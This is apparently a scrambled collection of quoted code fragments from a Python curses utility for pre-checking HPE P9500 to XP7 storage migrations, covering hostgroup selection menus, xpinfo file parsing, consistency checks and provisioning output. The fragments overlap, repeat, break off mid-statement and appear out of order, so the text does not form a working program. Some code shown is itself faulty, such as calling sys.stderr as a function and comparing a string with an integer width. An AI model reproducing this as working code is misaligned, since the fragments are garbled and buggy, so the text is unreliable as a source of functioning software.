"main_menu.display() ### refresh & wait ### stdscr.refresh() stdscr.getkey() #################### ### parse config ###",
"screen ### stdscr.clear() ### check window heigth and width ### if curses.COLS <",
"{} for box_name in boxpair_dict[boxpair_name]: hostgroup_name_list = box_dict[box_name].get_hostgroups() for hostgroup_name in hostgroup_name_list: if",
"self.slice_start += n if self.slice_start < 0: self.slice_start = 0 self.slice_end = self.slice_start",
"consistency menu ### hostgroup_consistency = ShowConsistencyMenu(menu_win,selection,consistent,stdscr) main_menu_items.append((\"Show HOSTGROUPs consistency check results\",hostgroup_consistency.display)) main_menu_items.append((\"Clear HOSTGROUP",
"value.split(\",\") for name,value in cfg.items(\"serialnbr\"): serialnbr_dict[name.upper()] = int(value) for name,value in cfg.items(\"instance\"): instance_dict[name.upper()]",
"slice up ### self.slice_start += n if self.slice_start < 0: self.slice_start = 0",
"self.window.clear() self.update() while True: self.window.clear() self.window.refresh() curses.doupdate() for index,item in enumerate(self.filtered_items): if index",
"self.search_str class Consistent(object): def __init__(self,window,title,stdscr): self.window = window self.heigth,self.width = self.window.getmaxyx() self.title =",
"sys.stderr(err_msg + \"\\n\") sys.exit(1) if box_name in site_dict: site = site_dict[box_name] else: err_msg",
"check\".format(box_name,hostgroup_name)) else: logger.debug(\"{}-{} does not exists\".format(box_name,hostgroup_name)) ### now we know what to display",
"menu ### hostgroup_consistency = ShowConsistencyMenu(menu_win,selection,consistent,stdscr) main_menu_items.append((\"Show HOSTGROUPs consistency check results\",hostgroup_consistency.display)) main_menu_items.append((\"Clear HOSTGROUP selection\",selection.clear))",
"1.3 Add config file 2.0 Consistency check update 2.1 Add xpinfo file processing",
"self.window.clear() self.panel.hide() panel.update_panels() curses.doupdate() #################################################################################################### ### MAIN #################################################################################################### def main(stdscr): ### clear screen",
"\"\" def display(self): self.window.clear() line = \"{}: {}\".format(self.title,self.search_str) if len(line) >= self.width: line",
"in select_item_dict: select_item_dict[hostgroup_name] = set() select_item_dict[hostgroup_name].add((box_name,hostgroup_name)) hg_by_box_menu = Select_Menu(menu_win,select_item_dict,selection,search,stdscr) main_menu_items.append((\"Select {} HOSTGROUP\".format(boxpair_name),hg_by_box_menu.display)) ###",
"file\",write_prov.display)) main_menu = Menu(menu_win,main_menu_items,stdscr) main_menu.display() ### refresh & wait ### stdscr.refresh() stdscr.getkey() ####################",
"box_name in serialnbr_dict: serial_nbr = serialnbr_dict[box_name] else: err_msg = \"No serial nbr defined",
"csv.reader(f,delimiter=\",\",quotechar=\"'\") for row in xpinfo_file_reader: if len(row) > 8: hostname = row[0] device_name",
"elif key == curses.KEY_NPAGE: self.navigate(10) self.window.clear() self.panel.hide() panel.update_panels() curses.doupdate() class Select_XPinfo(object): def __init__(self,window,selection,xpinfo_dir,stdscr):",
"0: self.position = 0 elif self.position >= len(self.filtered_items): self.position = len(self.filtered_items) - 1",
"### self.slice_start = 0 self.slice_len = min(len(self.display_list),self.heigth-6) self.slice_end = self.slice_start + self.slice_len while",
"= self.window.getstr() ### after we received the response ### self.update_object.set(self.reply) self.window.clear() self.panel.hide() panel.update_panels()",
"if box_dict[box_name].test_hostgroup_exists(hostgroup_name): sf = os.path.join(self.map_dir,\"{}_{}.prov\".format(box_name,hostgroup_name)) with open(sf,\"wt\") as sfh: box_dict[box_name].print_provisioning(hostgroup_name,sfh) self.window.addstr(2,2,\"Written..\") else: self.window.addstr(2,2,\"Cancelled..\")",
"criteria \"\"\" if self.search.get() != \"\": logger.debug(\"Select_Menu.update :: update items to match search",
"line = line[:self.width-1] ### only add lines in the slice ### # logger.debug(\"SelectMenu.display",
"set() for ldev_nbr in ldev_dict[serial_nbr]: for hostgroup_name in box_dict[box_name].get_ldev_hostgroups(ldev_nbr): hostgroup_dict[box_name].add(hostgroup_name) ### add found",
"#################### ### parse config ### #################### configfile = \"xpmig.ini\" cfg = ConfigParser() cfg.read(configfile)",
"{}, exiting..\".format(box_name) logger.error(err_msg) sys.stderr(err_msg + \"\\n\") sys.exit(1) if box_name in serialnbr_dict: serial_nbr =",
"selection self.search = search def update(self): \"\"\" update the selection items list to",
"0: if self.slice_end - self.position < 2 and self.slice_end < len(self.xpinfo_file_list) - 1:",
"select hostgroups by host (hba_wwn) ### select_item_dict = {} for boxpair_name in sorted(boxpair_dict.keys()):",
"elif n > 0: if self.slice_end < len(self.display_list) - 1: self.slice_end += n",
"sys.stderr.write(\"map file dir not defined, exiting..\\n\") sys.exit(1) serial_to_name_dict = {} for box_name,serial_nbr in",
"lines in the slice ### # logger.debug(\"SelectMenu.display :: about to addstr line {}\".format(line))",
"self.width: line = line[:self.width-1] self.window.addstr(1,2,line) self.window.border() self.window.refresh() curses.doupdate() def add(self,item): current_set = set(self.selection)",
"self.text = text self.reply = \"\" self.update_object = upd_obj def display(self): self.panel.top() self.panel.show()",
"self.window.refresh() curses.doupdate() ### show the list of xpinfo files ### for index,item in",
"> len(self.filtered_items) - 1: self.slice_end = len(self.filtered_items) - 1 self.slice_start = self.slice_end -",
"row in xpinfo_file_reader: if len(row) > 8: hostname = row[0] device_name = row[1]",
"hostname = row[0] device_name = row[1] ldev_nbr = xp7.standard_format_ldev(row[5]) serial_nbr = int(row[8]) logger.debug(\"XPINFO:",
"else: self.window.addstr(2,2,\"Cancelled..\") self.window.clear() self.panel.hide() panel.update_panels() curses.doupdate() class Select_Menu(object): def __init__(self,window,items,selection,search,stdscr): self.window = window",
"log_size = 100000000 try: log_versions = cfg.getint(\"log\",\"maxversions\") except: log_versions = 5 try: log_dir",
"self.width: line = line[:self.width-1] ### only add lines in the slice ### if",
"name ### select_item_dict = {} for boxpair_name in sorted(boxpair_dict.keys()): for box_name in boxpair_dict[boxpair_name]:",
"Consistent(consistent_win,\"CONSISTENT HOSTGROUP(s)\",stdscr) consistent.display() ### define key_win ### key_win = stdscr.subwin(1,curses.COLS,curses.LINES-1,0) #key_win.clear() #key_win.refresh() #curses.doupdate()",
"ldev_dict: ldev_dict[serial_nbr].add(ldev_nbr) logger.debug(\"XPINFO: known S/N, added to ldev_dict, now at {} elements\".format(len(ldev_dict[serial_nbr]))) else:",
"HOSTGROUP\",hg_by_name_menu.display)) ### read XPINFO file ### xpinfo_menu = Select_XPinfo(menu_win,selection,xpinfo_dir,stdscr) main_menu_items.append((\"Read XPINFO file\",xpinfo_menu.display)) ###",
"ldev_nbr = xp7.standard_format_ldev(row[5]) serial_nbr = int(row[8]) logger.debug(\"XPINFO: got S/N {} LDEV {} from",
"self.update_object.set(self.reply) self.window.clear() self.panel.hide() panel.update_panels() curses.noecho() curses.doupdate() class Selection(object): def __init__(self,window,title,stdscr): self.window = window",
"collect_file = os.path.join(collect_dir,collectfile_dict[box_name]) if box_name in instance_dict: instance_nbr = instance_dict[box_name] else: err_msg =",
"= search_str self.display() def clear(self): self.search_str = \"\" self.display() def get(self): return self.search_str",
"self.display() def clear(self): del self.selection[:] self.display() def get(self): return self.selection class Search(object): def",
": Precheck to examine hostgroup is ready for migration AUTHOR : <NAME> /",
"self.slice_len while True: self.window.clear() self.window.refresh() curses.doupdate() for index,item in enumerate(self.display_list): if len(item) >=",
"box_dict[box_name].get_hostgroups() for hostgroup_name in hostgroup_name_list: if hostgroup_name not in select_item_dict: select_item_dict[hostgroup_name] = set()",
"try: map_dir = cfg.get(\"dir\",\"map\") except: sys.stderr.write(\"map file dir not defined, exiting..\\n\") sys.exit(1) serial_to_name_dict",
"self.window.clear() self.update() while True: self.window.clear() self.window.refresh() curses.doupdate() ### show the list of xpinfo",
"__init__(self,window,title,stdscr): self.window = window self.heigth,self.width = self.window.getmaxyx() self.title = title self.consistent = []",
"\"\"\" if os.path.exists(self.xpinfo_dir): del(self.xpinfo_file_list[:]) self.xpinfo_file_list = [f for f in os.listdir(self.xpinfo_dir) if os.path.isfile(\"{}/{}\".format(self.xpinfo_dir,f))",
"self.position = len(self.filtered_items) - 1 logger.debug(\"Select_Menu.navigate :: position = {}, n = {}\".format(self.position,n",
"enumerate(self.filtered_items): if index == self.position: mode = curses.A_STANDOUT else: mode = curses.A_NORMAL #",
"stdscr.subwin(3,curses.COLS,curses.LINES-4,0) consistent = Consistent(consistent_win,\"CONSISTENT HOSTGROUP(s)\",stdscr) consistent.display() ### define key_win ### key_win = stdscr.subwin(1,curses.COLS,curses.LINES-1,0)",
"self.width: line = line[:self.width-1] self.window.addstr(1,2,line) self.window.border() self.window.refresh() curses.doupdate() def add(self,item): current_set = set(self.consistent)",
"not defined, exiting..\\n\") sys.exit(1) serial_to_name_dict = {} for box_name,serial_nbr in serialnbr_dict.items(): serial_to_name_dict[serial_nbr] =",
"\"{}: \".format(self.text) if line >= self.width: line = line[:self.width-1] self.window.addstr(1,2,line) curses.echo() self.window.refresh() curses.doupdate()",
"curses.KEY_DOWN: self.navigate(1) self.window.clear() self.panel.hide() panel.update_panels() curses.doupdate() class InputMenu(object): def __init__(self,window,text,upd_obj,stdscr): self.window = window",
"during consistency check\".format(box_name,hostgroup_name)) else: logger.error(\"{}-{} not added to consistent hostgroup list during consistency",
"= window self.heigth,self.width = self.window.getmaxyx() self.window.keypad(1) self.panel = panel.new_panel(self.window) self.panel.hide() panel.update_panels() self.text =",
"self.xpinfo_file_list.append(\"exit\") self.slice_len = min(len(self.xpinfo_file_list)-1, self.heigth - 6) self.slice_start = 0 self.slice_end = self.slice_start",
"= {} hostgroup_dict = {} for serial_nbr in serial_nbr_set: ldev_dict[serial_nbr] = set() ###",
"logger.setLevel(log_level) fh = logging.handlers.RotatingFileHandler(logfile,maxBytes=log_size,backupCount=log_versions) formatter = logging.Formatter(\"%(asctime)s %(levelname)s %(message)s\",\"%Y/%m/%d-%H:%M:%S\") fh.setFormatter(formatter) logger.addHandler(fh) logger.info(\"#\" *",
"panel.update_panels() self.text = text self.reply = \"\" self.update_object = upd_obj def display(self): self.panel.top()",
"view on the items which fits in the window ### self.slice_start = 0",
"hostgroup_name in hostgroup_dict[box_name]: logger.debug(\"XPINFO processing: adding {}-{} to the selection\".format(box_name,hostgroup_name)) self.selection.add((box_name,hostgroup_name)) elif key",
"+ self.slice_len elif n > 0: if self.slice_end - self.position < 2 and",
"self.window.clear() self.panel.hide() panel.update_panels() curses.doupdate() class InputMenu(object): def __init__(self,window,text,upd_obj,stdscr): self.window = window self.heigth,self.width =",
"self.window.addstr(1+index,2,line,mode) key = self.window.getch() if key in [curses.KEY_ENTER,ord(\"\\n\"),ord(\"B\"),ord(\"b\")]: if self.position == len(self.items) -",
"while True: self.window.refresh() curses.doupdate() for index,item in enumerate(self.items): if index == self.position: mode",
"self.panel.hide() panel.update_panels() curses.doupdate() class InputMenu(object): def __init__(self,window,text,upd_obj,stdscr): self.window = window self.heigth,self.width = self.window.getmaxyx()",
"### define title_win ### title_win = stdscr.subwin(3,curses.COLS,0,0) title_win.addstr(1,2,\"HPE P9500 TO XP7 MIGRATION PRE-CHECK\")",
")) def display(self): self.panel.top() self.panel.show() self.window.clear() self.update() while True: self.window.clear() self.window.refresh() curses.doupdate() for",
"response ### self.update_object.set(self.reply) self.window.clear() self.panel.hide() panel.update_panels() curses.noecho() curses.doupdate() class Selection(object): def __init__(self,window,title,stdscr): self.window",
"curses.A_NORMAL # line = \"{}: {}\".format(index,item[0]) line = \"{}\".format(item[0]) if len(line) >= self.width:",
"show the list of xpinfo files ### for index,item in enumerate(self.xpinfo_file_list): if index",
"self.selection.get(): if box_dict[box_name].test_hostgroup_exists(hostgroup_name): ### TODO: add CA check ### result,report = box_dict[box_name].get_hostgroup_consistency(hostgroup_name) self.display_list.extend(report)",
"..\\n\") sys.exit(1) ### define title_win ### title_win = stdscr.subwin(3,curses.COLS,0,0) title_win.addstr(1,2,\"HPE P9500 TO XP7",
"consistent_win ### consistent_win = stdscr.subwin(3,curses.COLS,curses.LINES-4,0) consistent = Consistent(consistent_win,\"CONSISTENT HOSTGROUP(s)\",stdscr) consistent.display() ### define key_win",
"= window self.heigth,self.width = self.window.getmaxyx() self.selection = selection self.hostgroup_summary = [] self.window.keypad(1) self.panel",
"key in [curses.KEY_ENTER,ord(\"\\n\"),ord(\"B\"),ord(\"b\")]: break elif key == curses.KEY_UP: self.navigate(-1) elif key == curses.KEY_DOWN:",
"n > 0: if self.slice_end - self.position < 2 and self.slice_end < len(self.filtered_items)",
"item = item[:self.width-1] if self.slice_start <= index <= self.slice_end: self.window.addstr(1+(index-self.slice_start),2,item,curses.A_NORMAL) key = self.window.getch()",
"= line[:self.width-1] self.window.addstr(1,2,line) self.window.border() self.window.refresh() curses.doupdate() def add(self,item): current_set = set(self.consistent) current_set.add(item) self.consistent",
"hostgroup_dict[box_name]: logger.debug(\"XPINFO processing: adding {}-{} to the selection\".format(box_name,hostgroup_name)) self.selection.add((box_name,hostgroup_name)) elif key == curses.KEY_UP:",
"self.position == len(self.xpinfo_file_list) - 1: break else: logger.debug(\"XPINFO: start processing {}\".format(self.xpinfo_file_list[self.position])) serial_nbr_set =",
"key == curses.KEY_NPAGE: self.navigate(10) self.window.clear() self.panel.hide() panel.update_panels() curses.doupdate() class ShowConsistencyMenu(object): def __init__(self,window,selection,consistent,stdscr): self.window",
"elif self.position >= len(self.xpinfo_file_list): self.position = len(self.xpinfo_file_list) - 1 if n < 0:",
"not in select_item_dict: select_item_dict[hostgroup_name] = set() select_item_dict[hostgroup_name].add((box_name,hostgroup_name)) hg_by_box_menu = Select_Menu(menu_win,select_item_dict,selection,search,stdscr) main_menu_items.append((\"Select {} HOSTGROUP\".format(boxpair_name),hg_by_box_menu.display))",
"self.selection = [] def display(self): self.window.clear() line = \"{} : {}\".format(self.title, \",\".join([\"{}-{}\".format(x[0],x[1]) for",
"logger.debug(\"{}-{} does not exists\".format(box_name,hostgroup_name)) ### now we know what to display ### self.slice_start",
"hostgroup_dict: hostgroup_dict[box_name] = set() for ldev_nbr in ldev_dict[serial_nbr]: for hostgroup_name in box_dict[box_name].get_ldev_hostgroups(ldev_nbr): hostgroup_dict[box_name].add(hostgroup_name)",
"= cfg.get(\"dir\",\"xpinfo\") except: sys.stderr.write(\"xpinfo file dir not defined, exiting..\\n\") sys.exit(1) try: collect_dir =",
"by name ### select_item_dict = {} for boxpair_name in sorted(boxpair_dict.keys()): for box_name in",
"self.items[self.filtered_items[self.position]]: self.selection.add(add_item) elif key == curses.KEY_UP: self.navigate(-1) elif key == curses.KEY_DOWN: self.navigate(1) elif",
"self.window.keypad(1) self.panel = panel.new_panel(self.window) self.panel.hide() panel.update_panels() self.position = 0 self.xpinfo_dir = xpinfo_dir self.selection",
"for name,value in cfg.items(\"serialnbr\"): serialnbr_dict[name.upper()] = int(value) for name,value in cfg.items(\"instance\"): instance_dict[name.upper()] =",
"self.slice_len def display(self): self.panel.top() self.panel.show() self.window.clear() self.heigth,self.width = self.window.getmaxyx() ### fill the list",
"def display(self): self.window.clear() line = \"{} : {}\".format(self.title, \",\".join([\"{}-{}\".format(x[0],x[1]) for x in self.selection]))",
"the new search criteria \"\"\" if self.search.get() != \"\": logger.debug(\"Select_Menu.update :: update items",
"{}\".format(index,item[0]) line = \"{}\".format(item[0]) if len(line) >= self.width: line = line[:self.width-1] self.window.addstr(1+index,2,line,mode) key",
"elif n > 0: if self.slice_end - self.position < 2 and self.slice_end <",
"list(sorted(current_set)) self.display() def clear(self): del self.selection[:] self.display() def get(self): return self.selection class Search(object):",
"= csv.reader(f,delimiter=\",\",quotechar=\"'\") for row in xpinfo_file_reader: if len(row) > 8: hostname = row[0]",
"sys.stderr(err_msg + \"\\n\") sys.exit(1) box_dict[box_name] = xp7.XP7(box_name,instance_nbr,serial_nbr,site,collect_file) logger.info(\"XP7 object created for box {}",
"the list to display ### self.display_list = [] for box_name,hostgroup_name in self.selection.get(): if",
"panel.update_panels() curses.doupdate() class Select_XPinfo(object): def __init__(self,window,selection,xpinfo_dir,stdscr): self.window = window self.heigth,self.width = self.window.getmaxyx() self.xpinfo_file_list",
":: slide slice up to {}-{}\".format(self.slice_start,self.slice_end )) elif n > 0: if self.slice_end",
"in ldev_dict[serial_nbr]: for hostgroup_name in box_dict[box_name].get_ldev_hostgroups(ldev_nbr): hostgroup_dict[box_name].add(hostgroup_name) ### add found hostgroups to the",
"= [] def navigate(self,n): if n < 0: if self.slice_start >= 1: self.slice_start",
"= selection self.hostgroup_summary = [] self.window.keypad(1) self.panel = panel.new_panel(self.window) self.panel.hide() panel.update_panels() self.display_list =",
"search_str self.display() def clear(self): self.search_str = \"\" self.display() def get(self): return self.search_str class",
"line[:self.width-1] ### only add lines in the slice ### # logger.debug(\"SelectMenu.display :: about",
"Consistency check update 2.1 Add xpinfo file processing CONFIG : xpmig.ini LOG :",
"cfg.has_section(mandatory_section): sys.stderr(\"{} section missing in config file {}, exiting..\".format(mandatory_section,configfile)) sys.exit(1) for name,value in",
"{}\".format(index,item) line = \"{}\".format(item) if len(line) >= self.width: line = line[:self.width-1] ### only",
"- 1: self.slice_end = len(self.xpinfo_file_list) - 1 self.slice_start = self.slice_end - self.slice_len def",
"# logger.debug(\"SelectMenu.display :: index in slice {} - {}, executing addstr\".format(self.slice_start,self.slice_end)) self.window.addstr(1+(index-self.slice_start),2,line,mode) key",
"<B> BACK\",curses.A_BOLD) ### define menu_win ### menu_win = stdscr.subwin(curses.LINES-13,curses.COLS,3,0) # menu_win.border() main_menu_items =",
"logger.debug(\"Select_Menu.navigate :: position = {}, n = {}\".format(self.position,n )) ### adjust slice ###",
"x in self.items.keys() if re.search(self.search.get(),x,flags=re.IGNORECASE)] else: logger.debug(\"Select_Menu.update :: update items to match search",
"elif key == curses.KEY_UP: self.navigate(-1) elif key == curses.KEY_DOWN: self.navigate(1) elif key ==",
"file dir not defined, exiting..\\n\") sys.exit(1) try: map_dir = cfg.get(\"dir\",\"map\") except: sys.stderr.write(\"map file",
"defined, exiting..\\n\") sys.exit(1) try: xpinfo_dir = cfg.get(\"dir\",\"xpinfo\") except: sys.stderr.write(\"xpinfo file dir not defined,",
"self.title = title self.search_str = \"\" def display(self): self.window.clear() line = \"{}: {}\".format(self.title,self.search_str)",
"check\".format(box_name,hostgroup_name)) else: logger.error(\"{}-{} not added to consistent hostgroup list during consistency check\".format(box_name,hostgroup_name)) else:",
"cfg.read(configfile) for mandatory_section in (\"boxpair\",\"serialnbr\",\"instance\",\"site\",\"collect\",\"dir\"): if not cfg.has_section(mandatory_section): sys.stderr(\"{} section missing in config",
"hostgroup_name not in select_item_dict: select_item_dict[hostgroup_name] = set() select_item_dict[hostgroup_name].add((box_name,hostgroup_name)) hg_by_box_menu = Select_Menu(menu_win,select_item_dict,selection,search,stdscr) main_menu_items.append((\"Select {}",
"min(len(self.display_list),self.heigth-6) self.slice_end = self.slice_start + self.slice_len while True: self.window.clear() self.window.refresh() curses.doupdate() for index,item",
"key == curses.KEY_UP: self.navigate(-1) elif key == curses.KEY_DOWN: self.navigate(1) elif key == curses.KEY_PPAGE:",
"hostgroup_name_list = box_dict[box_name].get_hostgroups() for hostgroup_name in hostgroup_name_list: hba_wwn_list = box_dict[box_name].get_hostgroup_hba_wwns(hostgroup_name) for hba_wwn in",
"self.slice_len self.window.keypad(1) self.panel = panel.new_panel(self.window) self.panel.hide() panel.update_panels() self.position = 0 self.selection = selection",
"hba_wwn_list = box_dict[box_name].get_hostgroup_hba_wwns(hostgroup_name) for hba_wwn in hba_wwn_list: if len(hba_wwn.nickname.split(\"_\")) > 1: sel_item =",
"self.panel.hide() panel.update_panels() self.text = text self.reply = \"\" self.update_object = upd_obj def display(self):",
"panel.new_panel(self.window) self.panel.hide() panel.update_panels() def display(self): self.panel.top() self.panel.show() self.window.clear() self.window.addstr(1,2,\"Write provisioning out to file",
"start processing {}\".format(self.xpinfo_file_list[self.position])) serial_nbr_set = set(serialnbr_dict.values()) ldev_dict = {} hostgroup_dict = {} for",
"file\".format(serial_nbr,ldev_nbr)) if serial_nbr in ldev_dict: ldev_dict[serial_nbr].add(ldev_nbr) logger.debug(\"XPINFO: known S/N, added to ldev_dict, now",
"for box {}, exiting..\".format(box_name) logger.error(err_msg) sys.stderr(err_msg + \"\\n\") sys.exit(1) if box_name in site_dict:",
"[] self.consistent = consistent def navigate(self,n): if n < 0: if self.slice_start >=",
"= ShowSummaryMenu(menu_win,selection,stdscr) main_menu_items.append((\"Show HOSTGROUPs summary\",hostgroup_summary.display)) ### show hostgroup consistency menu ### hostgroup_consistency =",
"on status #################################################################################################### \"\"\" import curses from curses import panel import re import",
"selection.display() ### define consistent_win ### consistent_win = stdscr.subwin(3,curses.COLS,curses.LINES-4,0) consistent = Consistent(consistent_win,\"CONSISTENT HOSTGROUP(s)\",stdscr) consistent.display()",
"True: self.window.clear() self.window.refresh() curses.doupdate() for index,item in enumerate(self.display_list): if len(item) >= self.width: item",
"### xpinfo_menu = Select_XPinfo(menu_win,selection,xpinfo_dir,stdscr) main_menu_items.append((\"Read XPINFO file\",xpinfo_menu.display)) ### show hostgroup summary menu ###",
"logger.debug(\"Select_Menu.navigate :: slide slice up to {}-{}\".format(self.slice_start,self.slice_end )) elif n > 0: if",
"summary\",hostgroup_summary.display)) ### show hostgroup consistency menu ### hostgroup_consistency = ShowConsistencyMenu(menu_win,selection,consistent,stdscr) main_menu_items.append((\"Show HOSTGROUPs consistency",
"key in [curses.KEY_ENTER,ord(\"\\n\")]: if self.position == len(self.filtered_items) - 1: break else: # self.items",
"selection\".format(box_name,hostgroup_name)) self.selection.add((box_name,hostgroup_name)) elif key == curses.KEY_UP: self.navigate(-1) elif key == curses.KEY_DOWN: self.navigate(1) elif",
"box_name in hostgroup_dict: hostgroup_dict[box_name] = set() for ldev_nbr in ldev_dict[serial_nbr]: for hostgroup_name in",
"<= self.slice_end: # logger.debug(\"SelectMenu.display :: index in slice {} - {}, executing addstr\".format(self.slice_start,self.slice_end))",
"select_item_dict: select_item_dict[hostgroup_name] = set() select_item_dict[hostgroup_name].add((box_name,hostgroup_name)) hg_by_box_menu = Select_Menu(menu_win,select_item_dict,selection,search,stdscr) main_menu_items.append((\"Select {} HOSTGROUP\".format(boxpair_name),hg_by_box_menu.display)) ### select",
"instance_nbr = instance_dict[box_name] else: err_msg = \"No HORCM instance nbr defined for box",
"in os.listdir(self.xpinfo_dir) if os.path.isfile(\"{}/{}\".format(self.xpinfo_dir,f)) and re.match(\".+\\.xpinfo$\",f,flags=re.IGNORECASE)] self.xpinfo_file_list.append(\"exit\") self.slice_len = min(len(self.xpinfo_file_list)-1, self.heigth - 6)",
"in sorted(boxpair_dict.keys()): for box_name in boxpair_dict[boxpair_name]: hostgroup_name_list = box_dict[box_name].get_hostgroups() for hostgroup_name in hostgroup_name_list:",
"- 1: ### slide slice down ### self.slice_end += n if self.slice_end >",
"box {}, exiting..\".format(box_name) logger.error(err_msg) sys.stderr(err_msg + \"\\n\") sys.exit(1) if box_name in site_dict: site",
"### if curses.COLS < 20 or curses.LINES < 20: sys.stderr.write(\"Window not large enough,",
"slice down ### self.slice_end += n if self.slice_end > len(self.filtered_items) - 1: self.slice_end",
">= self.width: item = item[:self.width-1] if self.slice_start <= index <= self.slice_end: self.window.addstr(1+(index-self.slice_start),2,item,curses.A_NORMAL) key",
"self.slice_end - self.slice_len logger.debug(\"Select_Menu.navigate :: slide slice down to {}-{}\".format(self.slice_start,self.slice_end )) def display(self):",
"elif key in [curses.KEY_ENTER,ord(\"\\n\")]: if self.position == len(self.filtered_items) - 1: break else: #",
"for hostgroup_name in box_dict[box_name].get_ldev_hostgroups(ldev_nbr): hostgroup_dict[box_name].add(hostgroup_name) ### add found hostgroups to the selection ###",
"the window ### self.slice_start = 0 self.slice_len = min(len(self.filtered_items)-1,self.heigth-6) self.slice_end = self.slice_start +",
"### add found hostgroups to the selection ### for box_name in hostgroup_dict: for",
"== curses.KEY_NPAGE: self.navigate(10) self.window.clear() self.panel.hide() panel.update_panels() curses.doupdate() class Select_XPinfo(object): def __init__(self,window,selection,xpinfo_dir,stdscr): self.window =",
"csv import string import xp7 #################################################################################################### ### VARIABLES #################################################################################################### linelen = 100 boxpair_dict",
"re import logging import logging.handlers import copy from ConfigParser import ConfigParser import sys",
"for add_item in self.items[self.filtered_items[self.position]]: self.selection.add(add_item) elif key == curses.KEY_UP: self.navigate(-1) elif key ==",
"= Consistent(consistent_win,\"CONSISTENT HOSTGROUP(s)\",stdscr) consistent.display() ### define key_win ### key_win = stdscr.subwin(1,curses.COLS,curses.LINES-1,0) #key_win.clear() #key_win.refresh()",
"######################### ### instantiate boxes ### ######################### for box_name in collectfile_dict: collect_file = os.path.join(collect_dir,collectfile_dict[box_name])",
":: index in slice {} - {}, executing addstr\".format(self.slice_start,self.slice_end)) self.window.addstr(1+(index-self.slice_start),2,line,mode) key = self.window.getch()",
"self.window.addstr(1+(index-self.slice_start),2,item,curses.A_NORMAL) key = self.window.getch() if key in [curses.KEY_ENTER,ord(\"\\n\"),ord(\"B\"),ord(\"b\")]: break elif key == curses.KEY_UP:",
"self.search_str = \"\" def display(self): self.window.clear() line = \"{}: {}\".format(self.title,self.search_str) if len(line) >=",
"1.2 Add search term criteria 1.3 Add config file 2.0 Consistency check update",
"self.window.getstr() ### after we received the response ### self.update_object.set(self.reply) self.window.clear() self.panel.hide() panel.update_panels() curses.noecho()",
"set(serialnbr_dict.values()) ldev_dict = {} hostgroup_dict = {} for serial_nbr in serial_nbr_set: ldev_dict[serial_nbr] =",
"if serial_nbr in ldev_dict: ldev_dict[serial_nbr].add(ldev_nbr) logger.debug(\"XPINFO: known S/N, added to ldev_dict, now at",
"def display(self): self.panel.top() self.panel.show() self.window.clear() self.update() while True: self.window.clear() self.window.refresh() curses.doupdate() for index,item",
"stdscr.getkey() #################### ### parse config ### #################### configfile = \"xpmig.ini\" cfg = ConfigParser()",
"self.navigate(10) self.window.clear() self.panel.hide() panel.update_panels() curses.doupdate() #################################################################################################### ### MAIN #################################################################################################### def main(stdscr): ### clear",
"import xp7 #################################################################################################### ### VARIABLES #################################################################################################### linelen = 100 boxpair_dict = {} serialnbr_dict",
")) ### adjust slice ### if n < 0: if self.position - self.slice_start",
"- {}, executing addstr\".format(self.slice_start,self.slice_end)) self.window.addstr(1+(index-self.slice_start),2,line,mode) key = self.window.getch() if key in [ord(\"b\"),ord(\"B\")]: break",
"logger.addHandler(fh) logger.info(\"#\" * linelen) logger.info(\"XPMIG PRECHECK started\") logger.info(\"#\" * linelen) logger.info(\"Configuration settings :\")",
"get(self): return self.selection class Search(object): def __init__(self,window,title,stdscr): self.window = window self.heigth,self.width = self.window.getmaxyx()",
"1 self.slice_start = self.slice_end - self.slice_len def display(self): self.panel.top() self.panel.show() self.window.clear() self.heigth,self.width =",
"{}, exiting..\".format(box_name) logger.error(err_msg) sys.stderr(err_msg + \"\\n\") sys.exit(1) box_dict[box_name] = xp7.XP7(box_name,instance_nbr,serial_nbr,site,collect_file) logger.info(\"XP7 object created",
"to match the new search criteria \"\"\" if self.search.get() != \"\": logger.debug(\"Select_Menu.update ::",
"display ### self.slice_start = 0 self.slice_len = min(len(self.display_list),self.heigth-6) self.slice_end = self.slice_start + self.slice_len",
"self.panel.show() self.window.clear() line = \"{}: \".format(self.text) if line >= self.width: line = line[:self.width-1]",
"n if self.position < 0: self.position = 0 elif self.position >= len(self.filtered_items): self.position",
"< len(self.filtered_items) - 1: ### slide slice down ### self.slice_end += n if",
"> len(self.xpinfo_file_list) - 1: self.slice_end = len(self.xpinfo_file_list) - 1 self.slice_start = self.slice_end -",
"n < 0: if self.slice_start >= 1: self.slice_start += n if self.slice_start <",
"curses.doupdate() class ShowWriteProvisionMenu(object): def __init__(self,window,consistent,map_dir,stdscr): self.window = window self.consistent = consistent self.map_dir =",
"\"{}: {}\".format(self.title,self.search_str) if len(line) >= self.width: line = line[:self.width-1] self.window.addstr(1,2,line) self.window.border() self.window.refresh() curses.doupdate()",
"self.slice_end += n if self.slice_end > len(self.filtered_items) - 1: self.slice_end = len(self.filtered_items) -",
"- 1 if n < 0: if self.position - self.slice_start < 2 and",
"sys.exit(1) try: xpinfo_dir = cfg.get(\"dir\",\"xpinfo\") except: sys.stderr.write(\"xpinfo file dir not defined, exiting..\\n\") sys.exit(1)",
"ShowSummaryMenu(menu_win,selection,stdscr) main_menu_items.append((\"Show HOSTGROUPs summary\",hostgroup_summary.display)) ### show hostgroup consistency menu ### hostgroup_consistency = ShowConsistencyMenu(menu_win,selection,consistent,stdscr)",
"linelen) logger.info(\"XPMIG PRECHECK started\") logger.info(\"#\" * linelen) logger.info(\"Configuration settings :\") logger.info(\"BOXPAIR :\") logger.info(boxpair_dict)",
"logger.info(collectfile_dict) logger.info(\"XPINFO dir: {}\".format(xpinfo_dir)) ######################### ### instantiate boxes ### ######################### for box_name in",
"consistency check\".format(box_name,hostgroup_name)) else: logger.error(\"{}-{} not added to consistent hostgroup list during consistency check\".format(box_name,hostgroup_name))",
"= cfg.getint(\"log\",\"level\") except: log_level = 30 try: log_size = cfg.getint(\"log\",\"maxsize\") except: log_size =",
"self.width: item = item[:self.width-1] if self.slice_start <= index <= self.slice_end: self.window.addstr(1+(index-self.slice_start),2,item,curses.A_NORMAL) key =",
"index,item in enumerate(self.xpinfo_file_list): if index == self.position: mode = curses.A_STANDOUT else: mode =",
"1.1 Curses menu structure added 1.2 Add search term criteria 1.3 Add config",
"self.panel.hide() panel.update_panels() curses.doupdate() class Select_Menu(object): def __init__(self,window,items,selection,search,stdscr): self.window = window self.heigth,self.width = self.window.getmaxyx()",
"\"{}: {}\".format(index,item[0]) line = \"{}\".format(item[0]) if len(line) >= self.width: line = line[:self.width-1] self.window.addstr(1+index,2,line,mode)",
